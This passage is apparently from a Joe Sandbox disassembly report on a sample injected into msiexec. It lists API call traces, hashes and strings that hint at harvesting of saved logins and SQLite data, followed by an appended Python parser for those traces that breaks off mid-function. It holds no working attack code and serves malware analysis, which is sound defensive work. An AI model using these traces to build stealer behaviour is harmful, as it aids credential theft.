                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: -journal$-wal
                                                                                                    • API String ID: 438689982-2894717839
                                                                                                    • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                    • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3975816621-0
                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                    APIs
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                    • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                    • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                    • memset.MSVCRT ref: 00405E33
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                    • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2313361498-0
                                                                                                    • Opcode ID: dbf080e2312ba69413c855b5325c4e68162c72551a66d7fbd90f613b3fbf667c
                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                    • Opcode Fuzzy Hash: dbf080e2312ba69413c855b5325c4e68162c72551a66d7fbd90f613b3fbf667c
                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                                                    • String ID:
                                                                                                    • API String ID: 2047574939-0
                                                                                                    • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                    • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                    APIs
                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 4218492932-0
                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                    APIs
                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 438689982-4203073231
                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                    • API String ID: 3510742995-2446657581
                                                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                    • memset.MSVCRT ref: 00405ABB
                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4281309102-0
                                                                                                    • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                    • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfwcscat
                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                    • API String ID: 384018552-4153097237
                                                                                                    • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                    • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                    • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                    • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                    APIs
                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                    • String ID: 6$\
                                                                                                    • API String ID: 404372293-1284684873
                                                                                                    • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                    • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesErrorFileLastSleep$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1470729244-0
                                                                                                    • Opcode ID: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                    • Opcode Fuzzy Hash: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                    APIs
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1331804452-0
                                                                                                    • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                    • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                    • String ID: advapi32.dll
                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                    • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                    • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
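Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python parser for the APIs trace lines in this report, run over the entry above. That entry shows the pattern the report's signature list calls dynamically determining API calls: GetSystemDirectoryW and wcscat build a full path, LoadLibraryW loads it (the only string the function references is advapi32.dll), and five GetProcAddress calls follow. The sample input is that trace copied verbatim; the matching regex and the heuristic (a LoadLibrary* call in the function or one of its subcalls, followed by GetProcAddress) are my own assumptions about the report's line layout, not Joe Sandbox's detection logic.

```python
import re
from collections import Counter

# Constructed sample input: the "APIs" trace of the advapi32.dll entry above,
# copied in the report's own line format (bullet, optional "Part of subcall
# function XXXXXXXX:" prefix, func.MODULE, optional argument list, "ref:" address).
# The trailing "Strings" heading is included to show that non-trace lines are skipped.
SAMPLE_TRACE = """\
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\\Windows\\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
Strings
"""

# Assumed line layout (derived from the lines in this report, not documented by Joe Sandbox).
API_CALL = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-F]{8}):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"          # the argument list is absent on some lines
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


def parse_api_trace(text):
    """Turn the report's APIs lines into dicts; lines that do not match
    (section headings such as "Strings") are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_CALL.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "func": m.group("func"),
            "module": m.group("module"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("subcall"),   # None when the function calls the API directly
        })
    return calls


def module_histogram(calls):
    """How many calls go to each module (KERNEL32, MSVCRT, ...)."""
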